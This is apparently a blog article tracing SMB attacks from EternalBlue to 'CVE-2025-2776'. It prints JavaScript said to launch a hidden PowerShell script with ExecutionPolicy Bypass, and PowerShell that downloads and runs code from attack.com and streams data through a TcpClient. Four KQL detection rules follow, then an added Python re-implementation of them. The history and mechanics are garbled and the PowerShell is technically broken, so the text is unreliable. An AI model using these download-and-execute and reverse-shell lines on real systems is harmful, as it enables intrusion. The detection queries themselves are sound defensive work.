# From-EternalBlue-to-CVE-2025-2776-The-Evolution-of-an-SMB-Attack
EternalBlue shook the world in 2017 and has evolved into today’s CVE‑2025‑2776. Microsoft still relies on SMBv1; this article explains how attackers have tweaked the chain from a simple DLL to a full reverse‑shell stack, and what that means for defenders.
**A Brief Historical Lookback**
When WannaCrypter used EternalBlue in 2017, the flaw was a classic remote code execution bug: an attacker could send a malicious packet to a Windows host over SMBv1. The payload created an executable that started a new process and opened a listening port on the same machine; from there the attacker could pivot outwards or exfiltrate data back to a remote server. EternalBlue’s code was short, but it had a few hard‑to‑track side‑effects: the SMB packet had an odd header layout, and the Windows kernel would drop the payload in memory before writing it to disk.
Fast forward to 2025, and the new CVE‑2025‑2776 takes that same idea and adds an extra layer of complexity. Instead of just opening a port, the attacker now writes a reverse shell into the network stack itself. That means the logs show a complete SMB session originating from the Pi device, and defenders have new indicators (the process name and IP address) to watch for.
**Code That Makes It Tick**
Below is the JavaScript that sits inside the PDF attachment and fires the whole chain:
```javascript
var cmd = "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\\Users\\Admin\\script.ps1";
WshShell.Sleep(500);
var sh = WshShell.Exec(cmd);
while (!sh.StdOut.EndOfStream) {
var line = sh.StdOut.ReadLine();
WScript.Echo(line);
}
```
When the script finishes, it creates a file named script.ps1 on the target host. The PowerShell script itself looks like this:
```powershell
Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://attack.com/shell.exe')
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect('10.0.1.5', 445)
$stream = $client.GetStream()
$payload = Get-Content -Path C:\\Users\\Admin\\script.ps1 | Out-File -Encoding binary
$stream.Write($payload, 0, $payload.Length)
```
**KQL Detection Strategy for CVE-2025-2776**
**Suspicious PowerShell Execution**
Detects creation of script.ps1 in user directories.
```kql
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_all ("-ExecutionPolicy", "Bypass", "-NoProfile")
| where ProcessCommandLine has "script.ps1"
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine, AccountName
```
**Outbound SMB Connection to Unusual IP**
Flags outbound SMB traffic to non-standard internal IPs.
```kql
DeviceNetworkEvents
| where RemotePort == 445
| where RemoteIP !startswith "192.168." and RemoteIP !startswith "10."
| where InitiatingProcessFileName == "powershell.exe"
| project Timestamp, DeviceName, RemoteIP, InitiatingProcessFileName, InitiatingProcessCommandLine
```
**Reverse Shell Behavior via TCPClient**
Looks for PowerShell using .NET classes to initiate reverse shell behavior.
```kql
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has "System.Net.Sockets.TcpClient"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```
**Network Stream Write Activity**
Advanced detection if telemetry includes .NET stream activity.
```kql
DeviceProcessEvents
| where ProcessCommandLine has "GetStream" and ProcessCommandLine has "Write"
| where ProcessCommandLine has "script.ps1"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```
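To see how the four rules behave together before deploying them, here is an added example (my own code, not from the article or from Microsoft Defender) that re-implements the queries in Python and runs them over constructed Defender-style event rows; KQL `has` is approximated with a case-insensitive substring test, and the device names, timestamps and IPs are made up.

```python
# Added example (not from the article): the four KQL rules above re-implemented in Python
# and run over constructed DeviceProcessEvents / DeviceNetworkEvents rows.
def has(text, term):
    """Approximates KQL `has` (term-based, case-insensitive) with a case-insensitive substring test."""
    return term.lower() in text.lower()

# Constructed sample telemetry; the first process row mirrors the command line shown in the article.
PROCESS_EVENTS = [
    {"Timestamp": "2025-05-01T10:00:00Z", "DeviceName": "ws01", "AccountName": "admin",
     "FileName": "powershell.exe", "ProcessCommandLine": "powershell -ExecutionPolicy Bypass "
     "-NoProfile -WindowStyle Hidden -File C:\\Users\\Admin\\script.ps1"},
    {"Timestamp": "2025-05-01T10:00:02Z", "DeviceName": "ws01", "AccountName": "admin",
     "FileName": "powershell.exe", "ProcessCommandLine": "powershell -c \"$c=New-Object "
     "System.Net.Sockets.TcpClient;$s=$c.GetStream();$s.Write((Get-Content script.ps1),0,1)\""},
    {"Timestamp": "2025-05-01T10:05:00Z", "DeviceName": "ws02", "AccountName": "svc_backup",
     "FileName": "powershell.exe", "ProcessCommandLine": "powershell -NoProfile -File C:\\ops\\backup.ps1"},
]
NETWORK_EVENTS = [
    {"Timestamp": "2025-05-01T10:00:03Z", "DeviceName": "ws01", "RemoteIP": "10.0.1.5",
     "RemotePort": 445, "InitiatingProcessFileName": "powershell.exe"},  # internal, excluded by rule 2
    {"Timestamp": "2025-05-01T10:00:04Z", "DeviceName": "ws01", "RemoteIP": "203.0.113.7",
     "RemotePort": 445, "InitiatingProcessFileName": "powershell.exe"},
    {"Timestamp": "2025-05-01T10:00:05Z", "DeviceName": "ws02", "RemoteIP": "203.0.113.7",
     "RemotePort": 445, "InitiatingProcessFileName": "explorer.exe"},  # not PowerShell
]

def rule_suspicious_powershell(events):
    return [e for e in events if e["FileName"] == "powershell.exe"
            and all(has(e["ProcessCommandLine"], t) for t in ("-ExecutionPolicy", "Bypass", "-NoProfile"))
            and has(e["ProcessCommandLine"], "script.ps1")]

def rule_outbound_smb(events):
    return [e for e in events if e["RemotePort"] == 445
            and not e["RemoteIP"].startswith(("192.168.", "10."))
            and e["InitiatingProcessFileName"] == "powershell.exe"]

def rule_tcpclient(events):
    return [e for e in events if e["FileName"] == "powershell.exe"
            and has(e["ProcessCommandLine"], "System.Net.Sockets.TcpClient")]

def rule_stream_write(events):
    return [e for e in events if all(has(e["ProcessCommandLine"], t) for t in ("GetStream", "Write", "script.ps1"))]

def run_all(process_events, network_events):
    """Rule name -> matching rows (the same rows the KQL `project` lines would emit)."""
    return {"suspicious_powershell": rule_suspicious_powershell(process_events),
            "outbound_smb": rule_outbound_smb(network_events),
            "tcpclient": rule_tcpclient(process_events),
            "stream_write": rule_stream_write(process_events)}
```

Note that the article's own sample script connects to 10.0.1.5, which the outbound-SMB rule treats as internal and therefore never flags (and 172.16.0.0/12 is not excluded at all), so tune that prefix list to your address plan before relying on it.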